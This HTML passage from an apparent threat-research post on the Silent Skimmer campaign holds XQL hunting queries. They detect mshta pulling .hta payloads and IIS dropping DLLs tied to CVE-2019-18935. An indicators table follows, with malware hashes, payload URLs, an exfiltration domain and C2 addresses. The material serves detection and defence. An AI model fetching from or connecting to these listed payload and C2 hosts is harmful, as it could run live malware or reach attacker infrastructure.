class="crayon-i">action_process_image_command_line</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">actor_process_command_line</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">causality_actor_process_command_line</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">decoded_base64</span></div></div></td>
					</tr>
				</tbody></table></div>
			</div>
		</div><p></p><div id="crayon-672ebeddad672830942998" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate crayon-wrapped" data-settings=" minimize scroll-mouseover wrap" style="margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important; height: auto;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important; height: 18px !important; line-height: 18px !important; margin-top: -18px; display: none; position: absolute; z-index: 2;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button crayon-pressed" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button crayon-pressed" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code" style="display: none;"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea class="crayon-plain print-no" data-settings="dblclick" readonly="" style="tab-size: 4; font-size: 12px !important; line-height: 15px !important; z-index: 0; opacity: 0; overflow: hidden;">// Description: MSHTA command line

config case_sensitive = false

| dataset = xdr_data

| filter event_type = ENUM.PROCESS and event_sub_type = ENUM.PROCESS_START

| filter action_process_image_name = "mshta.exe" and action_process_image_command_line ~= "http://(?:(?:\d|[01]?\d\d|2[0-4]\d|25[0-5])\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d\d|\d)/(?:\d{2,3}|\d{1,3}-\d{2,3}|securityhealth|securityhealthsystray|shell|\w+).hta"

| fields _time, agent_hostname, agent_ip_addresses, action_process_image_name, action_process_image_command_line, actor_process_command_line, causality_actor_process_command_line</textarea></div>
			<div class="crayon-main" style="position: relative; z-index: 1; overflow: hidden;">
				<div class="table__wrapper"><table class="crayon-table" style="">
					<tbody><tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-672ebeddad672830942998-1" style="height: 15px;">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad672830942998-2" style="height: 15px;">2</div><div class="crayon-num" data-line="crayon-672ebeddad672830942998-3" style="height: 15px;">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad672830942998-4" style="height: 15px;">4</div><div class="crayon-num" data-line="crayon-672ebeddad672830942998-5" style="height: 15px;">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad672830942998-6" style="height: 15px;">6</div><div class="crayon-num" data-line="crayon-672ebeddad672830942998-7" style="height: 15px;">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad672830942998-8" style="height: 15px;">8</div><div class="crayon-num" data-line="crayon-672ebeddad672830942998-9" style="height: 45px;">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad672830942998-10" style="height: 15px;">10</div><div class="crayon-num" data-line="crayon-672ebeddad672830942998-11" style="height: 45px;">11</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-672ebeddad672830942998-1"><span class="crayon-c">// Description: MSHTA command line</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad672830942998-2">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad672830942998-3"><span class="crayon-e">config </span><span class="crayon-i">case_sensitive</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-t">false</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad672830942998-4">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad672830942998-5"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-i">dataset</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">xdr_data</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad672830942998-6">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad672830942998-7"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">filter </span><span class="crayon-i">event_type</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-t">ENUM</span><span class="crayon-sy">.</span><span class="crayon-e">PROCESS </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-i">event_sub_type</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-t">ENUM</span><span class="crayon-sy">.</span><span class="crayon-i">PROCESS_START</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad672830942998-8">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad672830942998-9"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">filter </span><span class="crayon-i">action_process_image_name</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-s">"mshta.exe"</span><span class="crayon-h"> </span><span class="crayon-st">and</span><span class="crayon-h"> </span><span class="crayon-i">action_process_image_command_line</span><span class="crayon-h"> </span><span class="crayon-sy">~</span>=<span class="crayon-h"> </span><span class="crayon-s">"http://(?:(?:\d|[01]?\d\d|2[0-4]\d|25[0-5])\.){3}(?:25[0-5]|2[0-4]\d|[01]?\d\d|\d)/(?:\d{2,3}|\d{1,3}-\d{2,3}|securityhealth|securityhealthsystray|shell|\w+).hta"</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad672830942998-10">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad672830942998-11"><span class="crayon-sy">|</span><span class="crayon-h"> </span><span class="crayon-e">fields </span><span class="crayon-i">_time</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">agent_hostname</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">agent_ip_addresses</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">action_process_image_name</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">action_process_image_command_line</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">actor_process_command_line</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">causality_actor_process_command_line</span></div></div></td>
					</tr>
				</tbody></table></div>
			</div>
		</div><p></p><div id="crayon-672ebeddad673481552593" class="crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate crayon-wrapped" data-settings=" minimize scroll-mouseover wrap" style="margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important; height: auto;">
		
			<div class="crayon-toolbar" data-settings=" mouseover overlay hide delay" style="font-size: 12px !important; height: 18px !important; line-height: 18px !important; margin-top: -18px; display: none; position: absolute; z-index: 2;"><span class="crayon-title"></span>
			<div class="crayon-tools" style="font-size: 12px !important;height: 18px !important; line-height: 18px !important;"><div class="crayon-button crayon-nums-button crayon-pressed" title="Toggle Line Numbers"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-plain-button" title="Toggle Plain Code"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-wrap-button crayon-pressed" title="Toggle Line Wrap"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-expand-button" title="Expand Code" style="display: none;"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-copy-button" title="Copy"><div class="crayon-button-icon"></div></div><div class="crayon-button crayon-popup-button" title="Open Code In New Window"><div class="crayon-button-icon"></div></div></div></div>
			<div class="crayon-info" style="min-height: 16.8px !important; line-height: 16.8px !important;"></div>
			<div class="crayon-plain-wrap"><textarea class="crayon-plain print-no" data-settings="dblclick" readonly="" style="tab-size: 4; font-size: 12px !important; line-height: 15px !important; z-index: 0; opacity: 0; overflow: hidden;">//Description: Looks for IIS processes dropping DLLs with a naming convention used in a public CVE-2019-18935 POC and in the current incident

dataset = xdr_data

|filter event_type = ENUM.FILE

|filter actor_process_image_name = "w3wp.exe"

|filter action_file_name ~= "^[0-9]{10}\.[0-9]{5,7}(?:\.dll|sleep\-[0-9]{10}-amd64)"

|fields _time, agent_hostname, actor_process_image_name, actor_process_command_line, action_file_path, action_file_sha256</textarea></div>
			<div class="crayon-main" style="position: relative; z-index: 1; overflow: hidden;">
				<div class="table__wrapper"><table class="crayon-table" style="">
					<tbody><tr class="crayon-row">
				<td class="crayon-nums " data-settings="show">
					<div class="crayon-nums-content" style="font-size: 12px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-672ebeddad673481552593-1" style="height: 30px;">1</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad673481552593-2" style="height: 15px;">2</div><div class="crayon-num" data-line="crayon-672ebeddad673481552593-3" style="height: 15px;">3</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad673481552593-4" style="height: 15px;">4</div><div class="crayon-num" data-line="crayon-672ebeddad673481552593-5" style="height: 15px;">5</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad673481552593-6" style="height: 15px;">6</div><div class="crayon-num" data-line="crayon-672ebeddad673481552593-7" style="height: 15px;">7</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad673481552593-8" style="height: 15px;">8</div><div class="crayon-num" data-line="crayon-672ebeddad673481552593-9" style="height: 15px;">9</div><div class="crayon-num crayon-striped-num" data-line="crayon-672ebeddad673481552593-10" style="height: 15px;">10</div><div class="crayon-num" data-line="crayon-672ebeddad673481552593-11" style="height: 30px;">11</div></div>
				</td>
						<td class="crayon-code"><div class="crayon-pre" style="font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;"><div class="crayon-line" id="crayon-672ebeddad673481552593-1"><span class="crayon-c">//Description: Looks for IIS processes dropping DLLs with a naming convention used in a public CVE-2019-18935 POC and in the current incident</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad673481552593-2">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad673481552593-3"><span class="crayon-i">dataset</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-i">xdr_data</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad673481552593-4">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad673481552593-5"><span class="crayon-sy">|</span><span class="crayon-e">filter </span><span class="crayon-i">event_type</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-t">ENUM</span><span class="crayon-sy">.</span><span class="crayon-i">FILE</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad673481552593-6">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad673481552593-7"><span class="crayon-sy">|</span><span class="crayon-e">filter </span><span class="crayon-i">actor_process_image_name</span><span class="crayon-h"> </span>=<span class="crayon-h"> </span><span class="crayon-s">"w3wp.exe"</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad673481552593-8">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad673481552593-9"><span class="crayon-sy">|</span><span class="crayon-e">filter </span><span class="crayon-i">action_file_name</span><span class="crayon-h"> </span><span class="crayon-sy">~</span>=<span class="crayon-h"> </span><span class="crayon-s">"^[0-9]{10}\.[0-9]{5,7}(?:\.dll|sleep\-[0-9]{10}-amd64)"</span></div><div class="crayon-line crayon-striped-line" id="crayon-672ebeddad673481552593-10">&nbsp;</div><div class="crayon-line" id="crayon-672ebeddad673481552593-11"><span class="crayon-sy">|</span><span class="crayon-e">fields </span><span class="crayon-i">_time</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">agent_hostname</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">actor_process_image_name</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">actor_process_command_line</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">action_file_path</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-i">action_file_sha256</span></div></div></td>
					</tr>
				</tbody></table></div>
			</div>
		</div><p></p></div><div class="section-wrapper" id="section-5"><h2 id="section-5-title" data-section="scrollable"><a id="post-137319-_v8176g40kstn"></a><strong>Indicators of Compromise</strong></h2><div class="table__wrapper"><table style="width: 100%;">
<tbody>
<tr>
<td style="text-align: center;"><b>Value</b></td>
<td style="text-align: center;"><b>Type</b></td>
<td style="text-align: center;"><b>Description</b></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">55271d94eb3c95bb6a1965d44bade5ecef5ff610e87133f169e602eb94c39d6b</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">RingQ Loader</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">1b325d32bc99db4b16e2cc4d4810c195f3643936d7ff5baee43ddd18cae9b2a6</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">RingQ Loader</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">85d67f9f6f82de5a8f5f92fcf9a82bbed2ff6f6d91a06a058a40c5a64882149b</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">RingQ Loader</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">b44e6fd83b87d50c8aa8cf62de2578a13c22292fcf298b7664ed828804280dbe</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">RingQ Loader</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">e3746de8993069f343a7334046a2361318e213e13883513a7c0713a847fd4dc9</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">RingQ Loader</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">64ae2bf6920311be2521c47678c04299bd24c2caec2df5b340aa212a69760fda</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">RingQ Loader</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">12508b830149c2d84f2c80947e78218128d16a834c8d0695068f3e773ac62ef9</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">GodPotato</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">0aa0ca465170315d2f02c471d5d96ce5fbd6076f59be83fa5398968e951a5f51</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">GodPotato</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">dc53581d4c9140b0f987eb6686d67db6d777f8c89114b062be35b8f2847aa66f</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">3579bae222eb8d7a7c3c16598cf9e81aecbbfc1a2ac2168430e48acfb02cfb24</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">5d82f31bc37aa18e5c5110968b1a85aa419c6e2840e17074d2519ed9ad5b914c</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">5ef5c841f74f9331efb5a43cd16d62fd27eb8293888e872a17c7a57795e37d75</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">7dadff4d883b32c01bbcb96baf081649dbfadd186b934a7fd3c9754e0ba87ab3</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">8ae2b420245ebbd983d42bb2d8ceb92f2e7ef40181d8f1cb347797ee7a61b2a1</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">c0244fafbd5231730fdd0bfef2a972dd074f52ca46dc377494424269add81d2b</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">c73e3b300ac9eb956a471cefb2282602834b5809c46b7807cfc06f671a5d9f8f</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Usage of mixed mode assemblies</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">f9e5e09788.ipv6.1433.eu.org</span></td>
<td><span style="font-weight: 400;">Domain&nbsp;</span></td>
<td><span style="font-weight: 400;">Connectivity checks</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">http://20.222.194[.]41/SecurityHealthSystray.hta</span></td>
<td><span style="font-weight: 400;">URL</span></td>
<td><span style="font-weight: 400;">MSHTA payload</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">http://20.210.230.146/SecurityHealthSystray.hta</span></td>
<td><span style="font-weight: 400;">URL</span></td>
<td><span style="font-weight: 400;">MSHTA payload</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">http://13.78.113[.]103/One.ps1</span></td>
<td><span style="font-weight: 400;">URL</span></td>
<td><span style="font-weight: 400;">PowerShell payload</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">http://13.71.153[.]8/logtest.ps1</span></td>
<td><span style="font-weight: 400;">URL</span></td>
<td><span style="font-weight: 400;">PowerShell payload</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">nigntboxcdn[.]com</span></td>
<td><span style="font-weight: 400;">FQDN</span></td>
<td><span style="font-weight: 400;">Exfiltration</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">342daa41ba3989d5ecb95c7c19a55c1a00c12b6c2faa2cac052bc910a6edd56f</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Web shell</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">28f0f37fcdee2ac2c022bb454b30f05458075434fa57662af2de22ba5cfb45c1</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Web shell</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">29a81d3125ab1c886266a03902204253708f8d181c547a88ceb447ef59f99f60</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Web shell</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">9b29964d0b3d026aa01713dbdf4361439788c05c8eb8723fc7cfb933245dec45</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Web shell</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">311935e115d678adbe502c8cc4e5396323f3f015ee186df6dc9f67ae0248104b</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Web shell</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">06710575d20cacd123f83eb82994879367e07f267e821873bf93f4db6312a97b</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Web shell</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">20[.]37.116.136</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">167[.]88.168.11</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">45[.]61.166.209</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">172[.]86.123.127</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">48[.]218.138.60</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">172[.]86.105.129</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">172[.]86.96.245</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">20[.]188.26.190</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">13[.]78.113.103</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">13[.]78.94.29</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">52[.]253.107.167</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">20[.]89.43.151</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">20[.]222.194.41</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">20[.]222.138.18</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">60[.]204.201.75</span></td>
<td><span style="font-weight: 400;">IP address</span></td>
<td><span style="font-weight: 400;">C2</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">5acac9846035863b178ff75fb2a8bdcd53e5d496007d032c3fb20e0dc8306fd9</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Shellcode runner</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">b1d10328d0cbe3413d1ec15888e5772e323798072fda1285f17b61a96bf0e34e</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Unknown</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">91a5f92908c561f1d1814d36da613c5b7411bb45554e1b2d19713f1f6d50a10c</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Cobalt Strike</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">8240d49629a558acc0426dff40c042fa989fb46159bb5971ee3c4211b68a59d0</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Unknown</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">a2a17e561d50f69e011598fd2e03b0376f6468609a1b2d6be9d458ee5c8b397d</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Unknown</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">b1da7982199597882a2da8c45114f4cf74fed64447fca8c5f58ced24d7085c77</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Reverse shell</span></td>
</tr>
<tr>
<td><span style="font-weight: 400; font-family: 'courier new', courier, monospace;">1c9a9732d600d975b5b44ab326d5cc99123a84d5b400a189902ff6d249a24bda</span></td>
<td><span style="font-weight: 400;">SHA256</span></td>
<td><span style="font-weight: 400;">Reverse shell</span></td>
</tr>
</tbody>
</table></div></div><div class="section-wrapper" id="section-6"><h2 id="section-6-title" data-section="scrollable"><a id="post-137319-_570cbe1pdhwx"></a><strong>Additional Resources</strong></h2><ul>
<li><a href="https://blogs.blackberry.com/en/2023/09/silent-skimmer-online-payment-scraping-campaign-shifts-targets-from-apac-to-nala" target="_blank" rel="noopener">It’s Silent Skimmer: Online Payment Scraping Campaign Shifts Targets From APAC to NALA</a> – BlackBerry</li>
<li><a href="https://news.sophos.com/en-us/2023/07/26/into-the-tank-with-nitrogen/" target="_blank" rel="noopener">Into the tank with Nitrogen</a> – Sophos News</li>
<li><a href="https://learn.microsoft.com/en-us/cpp/dotnet/mixed-native-and-managed-assemblies?view=msvc-170" target="_blank" rel="noopener">Mixed (Native and Managed) Assemblies</a> – Microsoft Learn</li>
<li><a href="https://www.mandiant.com/sites/default/files/2022-11/06-alamode.pdf" target="_blank" rel="noopener">Challenge 6: à la mode</a> [PDF] – Mandiant FLARE-On Challenge on mixed mode assemblies</li>
<li><a href="https://cybersecurity.att.com/blogs/security-essentials/dont-check-out-credit-card-skimming-activity-observed" target="_blank" rel="noopener">Don’t check out! – Credit card skimming activity observed</a> – LevelBlue</li>
<li><a href="https://github.com/T4y1oR/RingQ" target="_blank" rel="noopener">GitHub - T4y1oR/RingQ: 一款后渗透免杀工具，助力每一位像我这样的脚本小子快速实现免杀，支持bypass AV/EDR 360 火绒 Windows Defender Shellcode Loader</a> – T4y1oR on GitHub</li>
<li><a href="https://www.bleepingcomputer.com/news/security/blackcat-ransomware-shuts-down-in-exit-scam-blames-the-feds/" target="_blank" rel="noopener">BlackCat ransomware shuts down in exit scam, blames the "feds"</a> – Bleeping Computer</li>
<li><a href="https://www.paloaltonetworks.com/blog/security-operations/playbook-of-the-week-fending-off-living-off-the-land-attacks/" rel="noopener">Playbook Of The Week - Fending Off Living Off the Land Attacks</a> – Palo Alto Networks</li>
<li><a href="https://learn.microsoft.com/en-us/previous-versions/windows/embedded/aa940701(v=winembedded.5)?redirectedfrom=MSDN" target="_blank" rel="noopener">AI Skills Challenge, Primitive: Mshta.exe</a> – Microsoft Learn</li>
<li><a href="https://attack.mitre.org/techniques/T1218/005/" target="_blank" rel="noopener">System Binary Proxy Execution: Mshta, Sub-technique T1218.005</a> – MITRE ATT&amp;CK</li>
<li><a href="https://learn.microsoft.com/en-us/previous-versions//ms536471(v=vs.85)?redirectedfrom=MSDN" target="_blank" rel="noopener">AI Skills Challenge, HTML Applications</a> – Microsoft Learn</li>
<li><a href="https://attack.mitre.org/techniques/T1620/" target="_blank" rel="noopener">Reflective Code Loading, Technique T1620 - Enterprise</a> – Techniques, MITRE ATT&amp;CK</li>
</ul><p>&nbsp;</p></div></div>
              <!--<span class="post__date">Updated 6 November, 2024 at 11:30 AM PST</span>-->
              <button class="l-btn back-to-top" id="backToTop" data-page-track="true" data-page-track-value="silent-skimmer-latest-campaign:back to top">Back to top</button>
              
			<div class="be__tags-wrapper"> 
